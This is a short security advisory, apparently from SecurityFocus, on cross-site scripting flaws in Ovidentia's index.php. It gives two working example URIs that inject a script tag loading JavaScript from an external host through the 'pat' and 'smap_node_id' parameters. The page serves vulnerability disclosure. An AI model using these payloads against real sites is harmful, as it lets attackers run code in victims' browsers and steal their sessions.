Ovidentia 'index.php' Multiple Cross-Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/index.php?tg=search&pat=%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E

http://www.example.com/index.php?tg=oml&file=download.html&smap_node_id==%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus